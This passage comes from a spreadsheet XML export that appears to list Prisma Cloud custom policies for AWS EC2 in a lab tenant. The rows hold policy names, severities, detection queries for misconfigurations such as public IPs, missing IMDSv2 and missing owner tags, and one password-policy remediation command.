      <c r="D1640" t="inlineStr"/>
      <c r="E1640" t="inlineStr"/>
      <c r="F1640" t="inlineStr"/>
      <c r="G1640" t="b">
        <v>0</v>
      </c>
      <c r="H16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40" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1640" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1640" t="inlineStr">
        <is>
          <t>Copy of Cloned elevance</t>
        </is>
      </c>
      <c r="L1640" t="inlineStr"/>
      <c r="M1640" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1640" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1640" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1640" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1640" t="inlineStr"/>
      <c r="R1640" t="inlineStr"/>
      <c r="S1640" t="inlineStr"/>
      <c r="T1640" t="b">
        <v>0</v>
      </c>
      <c r="U1640" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1640" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1640" t="inlineStr"/>
      <c r="X1640" t="inlineStr"/>
      <c r="Y1640" t="inlineStr"/>
      <c r="Z1640" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) AND finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS EC2 Instance IAM Role not enabled' and 'AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)')) AND with : ( Vuln where SEVERITY &gt;= HIGH )</t>
        </is>
      </c>
      <c r="AA1640" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1640" t="inlineStr">
        <is>
          <t>2024-09-13 17:10:53</t>
        </is>
      </c>
      <c r="AC1640" t="inlineStr"/>
      <c r="AD1640" t="b">
        <v>0</v>
      </c>
      <c r="AE1640" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1640" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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40" t="inlineStr">
        <is>
          <t>f0b35472-473a-4488-bce6-b7f1fe468c27</t>
        </is>
      </c>
      <c r="AI1640" t="inlineStr">
        <is>
          <t>1d22599d-1f47-4082-925c-452d3f3db764</t>
        </is>
      </c>
      <c r="AJ1640" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1640" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" t="inlineStr"/>
      <c r="B1641" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1641" s="2" t="inlineStr"/>
      <c r="D1641" t="n">
        <v>4428</v>
      </c>
      <c r="E1641" t="n">
        <v>302</v>
      </c>
      <c r="F1641" t="n">
        <v>2</v>
      </c>
      <c r="G1641" t="b">
        <v>1</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1641" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1641" t="inlineStr">
        <is>
          <t>dm-test</t>
        </is>
      </c>
      <c r="L1641" t="inlineStr"/>
      <c r="M1641" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1641" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1641" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1641" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1641" t="inlineStr"/>
      <c r="R1641" t="inlineStr"/>
      <c r="S1641" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="T1641" t="b">
        <v>0</v>
      </c>
      <c r="U1641" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1641" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1641" t="inlineStr"/>
      <c r="X1641" t="inlineStr"/>
      <c r="Y1641" t="inlineStr"/>
      <c r="Z1641" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = tags does not contain "shi-must-audit" or tags does not contain "shi-project-reference"</t>
        </is>
      </c>
      <c r="AA1641" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1641" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1641" t="inlineStr"/>
      <c r="AD1641" t="b">
        <v>0</v>
      </c>
      <c r="AE1641" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1641" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>251e983d-d818-47e9-8b70-01a732e534dc</t>
        </is>
      </c>
      <c r="AI1641" t="inlineStr">
        <is>
          <t>72ebf59c-7731-4c08-93f1-7f422bf7c179</t>
        </is>
      </c>
      <c r="AJ1641" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1641" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" t="inlineStr"/>
      <c r="B1642" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1642" s="2" t="inlineStr"/>
      <c r="D1642" t="inlineStr"/>
      <c r="E1642" t="inlineStr"/>
      <c r="F1642" t="inlineStr"/>
      <c r="G1642" t="b">
        <v>0</v>
      </c>
      <c r="H16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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1642" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1642" t="inlineStr">
        <is>
          <t>migration_test_policy_vstoyko</t>
        </is>
      </c>
      <c r="L1642" t="inlineStr"/>
      <c r="M1642" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1642" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1642" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1642" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1642" t="inlineStr"/>
      <c r="R1642" t="inlineStr"/>
      <c r="S1642" t="inlineStr">
        <is>
          <t>vstoyko : test</t>
        </is>
      </c>
      <c r="T1642" t="b">
        <v>0</v>
      </c>
      <c r="U1642" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1642" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1642" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1642" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1642" t="inlineStr"/>
      <c r="Z1642" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1642" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1642" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1642" t="inlineStr"/>
      <c r="AD1642" t="b">
        <v>0</v>
      </c>
      <c r="AE1642" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1642" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>8f21c5c0-c238-4125-ac5b-e1a75885332a</t>
        </is>
      </c>
      <c r="AI1642" t="inlineStr">
        <is>
          <t>16588b52-36ec-47c8-8c23-907b2a8aeae6</t>
        </is>
      </c>
      <c r="AJ1642" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1642" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" t="inlineStr"/>
      <c r="B1643" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1643" s="2" t="inlineStr"/>
      <c r="D1643" t="n">
        <v>2237</v>
      </c>
      <c r="E1643" t="n">
        <v>138</v>
      </c>
      <c r="F1643" t="n">
        <v>2</v>
      </c>
      <c r="G1643" t="b">
        <v>1</v>
      </c>
      <c r="H16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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1643" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1643" t="inlineStr">
        <is>
          <t>build-terraform-124</t>
        </is>
      </c>
      <c r="L1643" t="inlineStr"/>
      <c r="M1643" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1643" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1643" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1643" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1643" t="inlineStr"/>
      <c r="R1643" t="inlineStr"/>
      <c r="S1643" t="inlineStr"/>
      <c r="T1643" t="b">
        <v>1</v>
      </c>
      <c r="U1643" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1643" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1643" t="inlineStr"/>
      <c r="X1643" t="inlineStr">
        <is>
          <t>Build Recommendation: fix it
IaC: fix it</t>
        </is>
      </c>
      <c r="Y1643"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'cliScriptTemplate': 'aws iam update-account-password-policy --minimum-password-length 14 --require-uppercase-characters --require-lowercase-characters --require-numbers --require-symbols --allow-users-to-change-password --password-reuse-prevention 24 --max-password-age 90'</t>
        </is>
      </c>
      <c r="Z1643" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule =  iamInstanceProfile.arn does not exist and state.code equals 16</t>
        </is>
      </c>
      <c r="AA1643" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1643" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1643" t="inlineStr"/>
      <c r="AD1643" t="b">
        <v>0</v>
      </c>
      <c r="AE1643" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1643" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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3" t="inlineStr">
        <is>
          <t>2469598d-2738-4515-b18c-f3fb24a2a07e</t>
        </is>
      </c>
      <c r="AI1643" t="inlineStr">
        <is>
          <t>b4922578-8e68-49b2-8ddb-dad98f17421f</t>
        </is>
      </c>
      <c r="AJ1643" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1643" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (GKE) - Level 2, Marc World Custom Compliance, PIPEDA, PIPEDA, RaviHCLCompliance</t>
        </is>
      </c>
      <c r="B1644" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1644" s="2" t="inlineStr"/>
      <c r="D1644" t="n">
        <v>0</v>
      </c>
      <c r="E1644" t="n">
        <v>0</v>
      </c>
      <c r="F1644" t="n">
        <v>2</v>
      </c>
      <c r="G1644" t="b">
        <v>1</v>
      </c>
      <c r="H16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44" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1644" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1644" t="inlineStr">
        <is>
          <t>TesterPolicy Marc Law</t>
        </is>
      </c>
      <c r="L1644" t="inlineStr"/>
      <c r="M1644" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1644" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1644" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1644" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1644" t="inlineStr">
        <is>
          <t>Access control</t>
        </is>
      </c>
      <c r="R1644" t="inlineStr">
        <is>
          <t>123456-1</t>
        </is>
      </c>
      <c r="S1644" t="inlineStr">
        <is>
          <t>marclabel,SEC-01-01,new_label</t>
        </is>
      </c>
      <c r="T1644" t="b">
        <v>0</v>
      </c>
      <c r="U1644" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1644" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1644" t="inlineStr">
        <is>
          <t>New Ec2</t>
        </is>
      </c>
      <c r="X1644" t="inlineStr">
        <is>
          <t>test remedy</t>
        </is>
      </c>
      <c r="Y1644" t="inlineStr"/>
      <c r="Z1644" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = launchTime exists</t>
        </is>
      </c>
      <c r="AA1644" t="inlineStr">
        <is>
          <t>Tunde Adenugba</t>
        </is>
      </c>
      <c r="AB1644" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1644" t="inlineStr"/>
      <c r="AD1644" t="b">
        <v>0</v>
      </c>
      <c r="AE1644" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1644" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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44" t="inlineStr">
        <is>
          <t>3ed542a2-5b98-4332-b8e8-56e050ba9228</t>
        </is>
      </c>
      <c r="AI1644" t="inlineStr">
        <is>
          <t>d5faf957-a7a4-450f-8fd4-a1e0ddeda07e</t>
        </is>
      </c>
      <c r="AJ1644" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1644" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" t="inlineStr"/>
      <c r="B1645" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1645" s="2" t="inlineStr"/>
      <c r="D1645" t="n">
        <v>0</v>
      </c>
      <c r="E1645" t="n">
        <v>0</v>
      </c>
      <c r="F1645" t="n">
        <v>2</v>
      </c>
      <c r="G1645" t="b">
        <v>1</v>
      </c>
      <c r="H16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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1645" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1645" t="inlineStr">
        <is>
          <t>Tag Rehan : AWS EC2 instance is assigned with public IP</t>
        </is>
      </c>
      <c r="L1645" t="inlineStr"/>
      <c r="M1645" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1645" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1645" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1645" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1645" t="inlineStr"/>
      <c r="R1645" t="inlineStr"/>
      <c r="S1645" t="inlineStr">
        <is>
          <t>Rehan</t>
        </is>
      </c>
      <c r="T1645" t="b">
        <v>0</v>
      </c>
      <c r="U1645" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1645" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1645" t="inlineStr">
        <is>
          <t>This policy identifies the AWS EC2 instance having a public IP address assigned.
AWS EC2 instances with public IPs are virtual servers hosted in the Amazon Web Services (AWS) cloud that can be accessed over the internet. Public IPs increase an EC2 instance's attack surface, necessitating robust security configurations to prevent unauthorized access and attacks.
It is recommended to use private IPv4 addresses for communication between EC2 instances and disassociate the public IP address from an instance or disable auto-assign public IP addresses in the subnet.</t>
        </is>
      </c>
      <c r="X1645" t="inlineStr">
        <is>
          <t>In a default VPC, instances get a public IP address. In a non-default VPC, the subnet configuration determines this.
You can't manually change an automatically-assigned public IP. To control public IP assignment:
To unassign the IP addresses associated with a network interface, follow the instructions here: 
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html#managing-network-interface-ip-addresses
Note: If you specify an existing network interface for eth0 (the primary network interface), you can't change its public IP address settings using the auto-assign public IP feature; the subnet settings will take precedence.
Modify the subnet's public IP addressing attribute by following these actions: 
 https://docs.aws.amazon.com/vpc/latest/userguide/vpc-ip-addressing.html#subnet-public-ip
If you are using an Elastic IP, the instance is internet-reachable. To disassociate an Elastic IP, follow these actions: 
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html#using-instance-addressing-eips-associating-different</t>
        </is>
      </c>
      <c r="Y1645" t="inlineStr"/>
      <c r="Z1645" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = networkInterfaces[*].association.publicIp exists</t>
        </is>
      </c>
      <c r="AA1645" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1645" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1645" t="inlineStr"/>
      <c r="AD1645" t="b">
        <v>0</v>
      </c>
      <c r="AE1645" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1645" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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5" t="inlineStr">
        <is>
          <t>648de2ed-b39c-40a2-a517-69719a97f076</t>
        </is>
      </c>
      <c r="AI1645" t="inlineStr">
        <is>
          <t>f0cfbbfb-e79f-4290-8832-7c72e102ebec</t>
        </is>
      </c>
      <c r="AJ1645" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1645" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" t="inlineStr"/>
      <c r="B1646" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1646" s="2" t="inlineStr"/>
      <c r="D1646" t="inlineStr"/>
      <c r="E1646" t="inlineStr"/>
      <c r="F1646" t="inlineStr"/>
      <c r="G1646" t="b">
        <v>1</v>
      </c>
      <c r="H16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46" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1646" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1646" t="inlineStr">
        <is>
          <t>dmensah-test-demo</t>
        </is>
      </c>
      <c r="L1646" t="inlineStr"/>
      <c r="M1646" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1646" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1646" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1646" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1646" t="inlineStr"/>
      <c r="R1646" t="inlineStr"/>
      <c r="S1646" t="inlineStr"/>
      <c r="T1646" t="b">
        <v>0</v>
      </c>
      <c r="U1646" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1646" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1646" t="inlineStr"/>
      <c r="X1646" t="inlineStr"/>
      <c r="Y1646" t="inlineStr"/>
      <c r="Z1646" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND json.rule = imageName exists</t>
        </is>
      </c>
      <c r="AA1646" t="inlineStr">
        <is>
          <t>Daryl Mensah</t>
        </is>
      </c>
      <c r="AB1646" t="inlineStr">
        <is>
          <t>2024-11-12 11:16:39</t>
        </is>
      </c>
      <c r="AC1646" t="inlineStr"/>
      <c r="AD1646" t="b">
        <v>0</v>
      </c>
      <c r="AE1646" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1646" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>95cef23a-1f85-4a17-a3c2-d4a135ec3022</t>
        </is>
      </c>
      <c r="AI1646" t="inlineStr">
        <is>
          <t>53aa5786-b7f4-4def-b172-56ed5114a5c7</t>
        </is>
      </c>
      <c r="AJ1646" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1646" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" t="inlineStr"/>
      <c r="B1647" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1647" s="2" t="inlineStr"/>
      <c r="D1647" t="n">
        <v>0</v>
      </c>
      <c r="E1647" t="n">
        <v>0</v>
      </c>
      <c r="F1647" t="n">
        <v>2</v>
      </c>
      <c r="G1647" t="b">
        <v>1</v>
      </c>
      <c r="H16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647" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1647" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1647" t="inlineStr">
        <is>
          <t>BP&amp;PB Attack Path -1</t>
        </is>
      </c>
      <c r="L1647" t="inlineStr"/>
      <c r="M1647" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1647" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1647" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1647" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1647" t="inlineStr"/>
      <c r="R1647" t="inlineStr"/>
      <c r="S1647" t="inlineStr"/>
      <c r="T1647" t="b">
        <v>0</v>
      </c>
      <c r="U1647" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1647" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1647" t="inlineStr">
        <is>
          <t>BP&amp;PB Attack Path -1</t>
        </is>
      </c>
      <c r="X1647" t="inlineStr"/>
      <c r="Y1647" t="inlineStr"/>
      <c r="Z1647" t="inlineStr">
        <is>
          <t>config from cloud.resource where resource.status = Active AND api.name = 'aws-ec2-describe-instances' AND json.rule = vpcId exists</t>
        </is>
      </c>
      <c r="AA1647" t="inlineStr">
        <is>
          <t>Bishvesh Pachauli</t>
        </is>
      </c>
      <c r="AB1647" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1647" t="inlineStr"/>
      <c r="AD1647" t="b">
        <v>0</v>
      </c>
      <c r="AE1647" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1647" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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47" t="inlineStr">
        <is>
          <t>36cd1693-4cbe-43b4-a562-8e065a36bc6b</t>
        </is>
      </c>
      <c r="AI1647" t="inlineStr">
        <is>
          <t>6ca48a4e-f23f-4137-8877-0ce4e736987d</t>
        </is>
      </c>
      <c r="AJ1647" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1647" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" t="inlineStr"/>
      <c r="B1648" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1648" s="2" t="inlineStr"/>
      <c r="D1648" t="inlineStr"/>
      <c r="E1648" t="inlineStr"/>
      <c r="F1648" t="inlineStr"/>
      <c r="G1648" t="b">
        <v>0</v>
      </c>
      <c r="H16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48" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1648" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1648" t="inlineStr">
        <is>
          <t>AWS EC2 - 0 Day - No Owner</t>
        </is>
      </c>
      <c r="L1648" t="inlineStr"/>
      <c r="M1648" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1648" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1648" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1648" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1648" t="inlineStr"/>
      <c r="R1648" t="inlineStr"/>
      <c r="S1648" t="inlineStr"/>
      <c r="T1648" t="b">
        <v>0</v>
      </c>
      <c r="U1648" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1648" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1648" t="inlineStr">
        <is>
          <t>Detect AWS VM instances that are older than 7 days and are missing the 'owner' tag.</t>
        </is>
      </c>
      <c r="X1648" t="inlineStr"/>
      <c r="Y1648" t="inlineStr"/>
      <c r="Z1648" t="inlineStr">
        <is>
          <t>config from cloud.resource where tag ( any ) != 'owner' AND api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = "tags[?(@.key=='Name' &amp;&amp; @.value!='prismacloud-scan')] size &gt; 0 and tags[*].key does not equal owner" addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1648" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1648" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1648" t="inlineStr"/>
      <c r="AD1648" t="b">
        <v>0</v>
      </c>
      <c r="AE1648" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1648" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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48" t="inlineStr">
        <is>
          <t>bc33f48d-64ae-4656-8639-031614b34d44</t>
        </is>
      </c>
      <c r="AI1648" t="inlineStr">
        <is>
          <t>d8527ba4-70dd-4789-85d5-67ef4ce3d1b2</t>
        </is>
      </c>
      <c r="AJ1648" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1648" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1649" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1649" s="2" t="inlineStr"/>
      <c r="D1649" t="inlineStr"/>
      <c r="E1649" t="inlineStr"/>
      <c r="F1649" t="inlineStr"/>
      <c r="G1649" t="b">
        <v>0</v>
      </c>
      <c r="H16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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1649" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1649" t="inlineStr">
        <is>
          <t>AWS EC2 - 45 Days - Owned v3</t>
        </is>
      </c>
      <c r="L1649" t="inlineStr"/>
      <c r="M1649" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1649" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1649" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1649" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1649" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1649" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S1649" t="inlineStr"/>
      <c r="T1649" t="b">
        <v>0</v>
      </c>
      <c r="U1649" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1649" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1649" t="inlineStr"/>
      <c r="X1649" t="inlineStr"/>
      <c r="Y1649" t="inlineStr"/>
      <c r="Z1649" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-instances' AND resource.status = Active AND json.rule = '_DateTime.ageInDays(launchTime) &gt; 45 and tags[*].value none start with prismacloud-scan and tags[*].key contains owner and tags[*].key none start with aws:autoscaling:groupName' addcolumn _DateTime.ageInDays(launchTime)</t>
        </is>
      </c>
      <c r="AA1649" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1649" t="inlineStr">
